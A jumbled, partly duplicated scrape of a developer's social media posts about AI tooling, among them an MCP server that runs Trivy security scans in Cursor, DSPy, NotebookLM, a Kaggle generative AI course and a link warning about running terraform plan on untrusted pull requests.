Everything including a demo is in the repo above so feel free to check it out - I included a detailed readme that should help make things clearer as well:
If you have any questions or want to chat about this, DMs are open π.
Everything including a demo is in the repo above so feel free to check it out - I included a detailed readme that should help make things clearer as well:
If you have any questions or want to chat about this, DMs are open π.
3. Trivy: Performs security scans on the project to identify vulnerabilities and suggests fixes.
2. MCP Server: Acts as an intermediary, receiving requests from the MCP client and orchestrating security scans and fixes by interfacing with Trivy.
In this project, two tools are exposed: one for initiating Trivy scans and another for applying fixes. the LLM can choose when to use them based on its context.
How does it work?
1. Cursor IDE (MCP Client): Serves as the development environment where code changes occur. With MCP support, Cursor's agent (Composer) has access to MCP tools.
Sharing a quick proof-of-concept project: Cursor-MCP-Trivy.
I put together an MCP server that leverages trivy to scan the active cursor project for security vulnerabilities whenever cursor's agent (composer) changes a dependency file, e.g adding a new dependency.
github.com/norbinsh/cur...
Cursorβs Privacy Mode starts OFF by default in the IDE, because clearly, they think sharing is caring. π
Check your settings and decide what works for you.
www.cursor.com/security#inf...
Good luck!
Using chatgpt new tasks feature as a website availability tool π
browser-use is pretty cool!
this demo's repo i setup is here github.com/norbinsh/kub...
gitcicd.com
Small platform i built you can use to analyze a github repo for actions workflow potential risks, give it a go! π€
The Model Context Protocol (MCP) is an open standard for giving large language models secure, controlled access to tools and data sources.
"Think of MCP like a USB-C port for AI applications."
modelcontextprotocol.io/introduction
gitdiagram.com
This tool will generate a mermaid diagram from a git(hub) repository.
DSPy from Stanford NLP: a Python library for building multi-step LLM pipelines and prompt optimization.
dspy.ai
See in my attached example how it takes a tiny one-liner prompt, convert it (using llm as well) into sub questions - answer them - summarize, and return a final answer.
5. Regulation should focus on the capabilities and actions of the entire system, not just the llm itself.
4. Data-driven optimization techniques (like those offered by dsp ai) can help you automatically find the best prompting and sampling strategies for your system.
3. Even small language models can outperform giant ones when they are part of a well-designed system.
2. A powerful llm is useless without a robust system to support it. This includes:
- Carefully engineered prompting strategies
- Effective sampling methods for text generation
- Integration with relevant tools (like databases, and web access)
Interesting take on how we often over-emphasizes llms while neglecting the important role of building complete AI systems:
www.youtube.com/watch?v=vRTc...
1. The complete system running it, and not just the llm itself, are the key to unlocking the true potential of AI.
Some decent AI related "freebies" @ www.aiengineerpack.com - I am not affiliated with that site, just sharing in case and it'll help some others as well, grabbed an annual Perplexity pro sub for no cost. Good luck! (Oh and... always best to remove requested access once you are "done" with it).
Running terraform plan on untrusted code isnβt as safe as it seems. Most ci setups I know would allow developers to do this on the PR phase, before even submitting the PR to a code review.
good read: snyk.io/blog/gitflop...
Check out the first day live stream here if interested youtu.be/kpRyiJUUFxY?...
Google and Kaggle have launched a comprehensive, no-cost Generative AI course. Each day focuses on key topics:
β’ Day 1: Foundational Models & Prompt Engineering
β’ Day 2: Embeddings and Vector Databases
β’ Day 3: Generative AI Agents
β’ Day 4: Domain-Specific LLMs
β’ Day 5: MLOps for Generative AI
technical, not skip any details, and sharing with it what is my purpose and why i would like this podcast. (e.g to learn about a subject or whatever the reason is).
some relevant youtube videos, and some whitepapersand all put together, came out great. I really like how u can mix these sources together and just listen to the overall summary. also I noticed the instructions u can provide to the podcast generation request makes a difference. i ask it to be
There are many! But for instance, I wanted to learn more about online payments from a system design perspective. So i went ahead and created a new collection, and pushed in quite a few relevant API docs pages from stripe, some relevant blog posts from their engineering blog, as well as
Been using Google's "notebooklm" almost daily to βlistenβ to whitepapers or get quick intros to new topics with its podcast feature. Itβs my go-to for deep dives while on the move. free and super convenient!
Screenshot of AWS documentation page titled βModel distillation in Amazon Bedrock.β The text explains the process of transferring knowledge from a teacher model to a student model using synthetic data. The page includes a βFocus modeβ toggle and text size adjustment slider on the right sidebar.
Shoutout to AWS for the βFocus modeβ in their docs β a simple but game-changing feature for reading without distractions. More platforms should definitely follow this.